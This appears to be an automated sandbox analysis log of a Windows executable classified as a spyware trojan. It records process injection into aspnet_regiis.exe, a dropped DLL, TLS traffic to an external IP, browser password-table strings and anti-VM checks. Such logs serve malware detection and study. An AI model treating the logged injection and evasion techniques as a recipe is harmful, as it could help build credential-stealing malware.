Source: aspnet_regiis.exe, 00000002.00000003.1774290619.00000000051CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.223.140:443 -> 192.168.2.4:49744 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe

Static PE information: section name: W{2/c

PE file has nameless sections

Source: file.exe

Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe

Memory allocated: 72AC0000 page execute and read and write

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD936C0 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,GetConsoleWindow,ShowWindow,		0_2_6CD936C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD92E60 GetModuleHandleW,NtQueryInformationProcess,		0_2_6CD92E60

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00630A70	0_2_00630A70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0062BC10	0_2_0062BC10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006182B0	0_2_006182B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00618090	0_2_00618090
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00615570	0_2_00615570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00629F20	0_2_00629F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00633320	0_2_00633320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006301F0	0_2_006301F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006175A0	0_2_006175A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD936C0	0_2_6CD936C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD92E60	0_2_6CD92E60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD91200	0_2_6CD91200
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD93470	0_2_6CD93470
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CDA03C1	0_2_6CDA03C1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD92790	0_2_6CD92790
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CD96370	0_2_6CD96370

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 1224

Source: file.exe, 00000000.00000000.1672730785.0000000000666000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameUlyssesTessaSamuel.rYPIT vs file.exe
Source: file.exe, 00000000.00000002.2350943635.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameUlyssesTessaSamuel.rYPIT vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: W{2/c ZLIB complexity 1.0003205224328215

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/7@1/1

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\gdi32.dll

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7132
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5260:120:WilError_03

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\a79b116a-e7ff-4340-912e-17ecac6aa1ba

Jump to behavior

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: aspnet_regiis.exe, 00000002.00000003.1726325297.0000000004F96000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1749351821.0000000004F79000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe

ReversingLabs: Detection: 26%

Source: file.exe	String found in binary or memory: -addpset
Source: file.exe	String found in binary or memory: -addfulltrust
Source: file.exe	String found in binary or memory: -addgroup
Source: file.exe	String found in binary or memory: -help

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7132 -s 1224
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: %%.pdb source: file.exe, 00000000.00000002.2350885780.0000000000AFA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: file.exe, 00000000.00000002.2350943635.0000000000C99000.00000004.00000020.00020000.00000000.sdmp, WER4C58.tmp.dmp.5.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: file.exe, 00000000.00000002.2350943635.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: file.exe, 00000000.00000002.2350943635.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\file.PDB source: file.exe, 00000000.00000002.2350885780.0000000000AFA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\file.PDB source: file.exe, 00000000.00000002.2350943635.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER4C58.tmp.dmp.5.dr
Source:	Binary string: n0C:\Windows\mscorlib.pdb source: file.exe, 00000000.00000002.2350885780.0000000000AFA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: file.exe, 00000000.00000002.2350943635.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER4C58.tmp.dmp.5.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.5e0000.0.unpack W{2/c:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;

Source: file.exe	Static PE information: section name: W{2/c
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E264D push ebx; retf	0_2_005E2651
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E564D push ds; retf	0_2_005E56BA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E5468 push B7E5E5E6h; ret	0_2_005E54CF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E57C2 pushad ; retf	0_2_005E5887
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005E27A3 push ss; iretd	0_2_005E27AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_3_02C91FBD push esi; retf	2_3_02C91FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_3_02C91FBD push esi; retf	2_3_02C91FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_3_02C91FBD push esi; retf	2_3_02C91FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_3_02C91FBD push esi; retf	2_3_02C91FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_3_02C91B3F push FFFFFFDBh; iretd	2_3_02C91B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_3_02C91B3F push FFFFFFDBh; iretd	2_3_02C91B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_3_02C91B3F push FFFFFFDBh; iretd	2_3_02C91B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_3_02C91B3F push FFFFFFDBh; iretd	2_3_02C91B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_3_02C91FBD push esi; retf	2_3_02C91FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_3_02C91FBD push esi; retf	2_3_02C91FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_3_02C91FBD push esi; retf	2_3_02C91FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_3_02C91FBD push esi; retf	2_3_02C91FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_3_02C91B3F push FFFFFFDBh; iretd	2_3_02C91B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_3_02C91B3F push FFFFFFDBh; iretd	2_3_02C91B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_3_02C91B3F push FFFFFFDBh; iretd	2_3_02C91B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_3_02C91B3F push FFFFFFDBh; iretd	2_3_02C91B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_3_02C91FBD push esi; retf	2_3_02C91FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_3_02C91FBD push esi; retf	2_3_02C91FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_3_02C91FBD push esi; retf	2_3_02C91FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_3_02C91FBD push esi; retf	2_3_02C91FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_3_02C91B3F push FFFFFFDBh; iretd	2_3_02C91B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_3_02C91B3F push FFFFFFDBh; iretd	2_3_02C91B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_3_02C91B3F push FFFFFFDBh; iretd	2_3_02C91B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_3_02C91B3F push FFFFFFDBh; iretd	2_3_02C91B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_3_02C91FBD push esi; retf	2_3_02C91FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_3_02C91FBD push esi; retf	2_3_02C91FC0

Source: file.exe

Static PE information: section name: W{2/c entropy: 7.999654523046763

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\gdi32.dll

Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: file.exe PID: 7132, type: MEMORYSTR

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 28A0000 memory reserve \| memory write watch	Jump to behavior
